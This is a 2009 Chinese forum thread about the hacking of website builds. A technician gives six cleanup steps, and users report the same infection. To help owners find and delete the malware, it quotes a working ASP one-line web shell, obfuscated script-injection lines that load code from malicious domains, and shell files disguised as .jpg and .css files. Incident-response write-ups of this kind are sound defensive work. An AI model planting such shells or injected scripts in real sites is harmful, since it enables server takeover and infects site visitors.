pan888 发表于 2009-8-24 15:07:58

技术员来看看,我网站被挂马了!(技术已回复)

技术员来看看,我网站被挂马了!地址:www.vovjob.comQQ:237154335

技术答复:解决办法如下
第一步:修改后台路径,凡是被挂马的站点必须修改后台路径,修改目录名称后在后台网站配置里边修改对应的目录名称;
第二步:修改所有管理员的密码,密码由字母大小写特殊符合及数字不规则排列组成,密码长度最好为12位以上;
第三步:打开(8月24日)的站点日志,查找“59.55.175.235”、“59.55.171.180”,查找的结果会出现类似
2009-08-24 10:25:56 W3SVC887146513 220.187.26.66 POST /Admin/Hr/bottum.asp - 80 - 59.55.175.235
在网站空间里找出对应的文件,用记事本打开查看代码,如果文件代码类似下边这样的,那么就是木马文件,立即删除;
<%set ms = server.CreateObject(\"MSScriptControl.ScriptControl.1\")
ms.Language=\"VBScript\"
ms.AddObject \"Response\", Response
ms.AddObject \"request\", request
ms.AddObject \"session\", session
ms.AddObject \"server\", server
ms.AddObject \"application\", application
ms.ExecuteStatement (\"ex\";\"ecute(request(chr(35)))\")%>

<%execute request(\"#\")%>
第四步:重新生成模版,进入后台风格模版---模版方案管理---点网站的模版方案生成,然后在系统相关---清理系统缓存,进行清理模版缓存,如果站点开启了生成静态功能,请随后重新生成所有需要生成的文件;
第五步:清理ASP、JS中的木马代码,打开JS目录里边的文件,查看是否有document.writeln('<script type=\"text/javascript\" language=\"JavaScript\" src=\"http://c%30812.2288.org\" id=\"seraph4script2429\"><\/script>');
document.writeln('<script id=\"seraph3script302\" type=\"text/javascript\" src=\"http://0810.6600.o%72g\" language=\"JavaScript\"><\/script>');这个代码,有的话,删除该字符所在的整行代码,打开站点首页index.asp文件,查看最后一行代码如果是</script>结束的,删除%>之后的所有代码。
第六步:打开网站,浏览各频道页面及部分内容页,看是否还提示有木马提示,如果有提示,说明没有清理完整,可以通过查看源代码来找到被挂的代码,如果页面上没有,应该在JS里边,认真查看所有JS并清理。

清理的过程中如遇到遇到请跟本贴提出,禁止另开新帖,新开帖不予回复!

感谢用户chentaonc 提供详细的被修改文件列表,请对照检查自己网站的对应文件!
http://bbs.yjys.net/thread-21340-1-1.html

350701030 发表于 2009-8-24 15:36:25

靠,我的今天也被挂了

pan888 发表于 2009-8-24 15:37:06

document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');


JS文件里面多了这个漏洞。

350701030 发表于 2009-8-24 15:37:23

一样的 木马,整个程序都有

350701030 发表于 2009-8-24 15:39:27

我的也是http://0810.6600.org/,希望官方查查啊

jyq200 发表于 2009-8-24 16:40:13

我的也是这个,我看了一下iis日志,是admin/Template/Admin_Addskin.asp这个文件造成的

pan888 发表于 2009-8-24 16:50:17

除了JS代码里面有document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');
这个以外,还有就是后台查看HTML文件有一个help.asp;.jpg得文件,CSS样式也多了一个default.asp;.css的文件。现在我把它们清除了,然后把FOS关掉,不知道能不能顶得住,希望官方的老大看一下。谢谢!

pan888 发表于 2009-8-24 16:51:17

除了JS代码里面有document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://0810.%36%3600.org\" id=\"seraph3script7240\"><\\/script>\');
// JavaScript Document
<!--
function fnRemoveBrank(strSource)
{
return strSource.replace(/^\\s*/,\'\').replace(/\\s*$/,\'\');
这个以外,还有就是后台查看HTML文件有一个help.asp;.jpg得文件,CSS样式也多了一个default.asp;.css的文件。现在我把它们清除了,然后把FOS关掉,不知道能不能顶得住,希望官方的老大看一下。谢谢!

木野真情 发表于 2009-8-24 17:57:02

document.writeln(\'<script language=\"JavaScript\" type=\"text/javascript\" src=\"http://08%310.6600.org\" id=\"seraph3script5390\"><\\/script>\');
_dwrite(\"<script language=javascript src=\"+url+\"/count.asp?style=\"+style+\"&referer=\"+escape(document.referrer)+\"></script>\");
function _dwrite(string) {document.write(string);}看看。我的也是的 。

pan888 发表于 2009-8-24 18:00:58

呵呵,等官方出补丁吧。大哥们冲啊~
页: [1] 2 3 4
查看完整版本: 技术员来看看,我网站被挂马了!(技术已回复)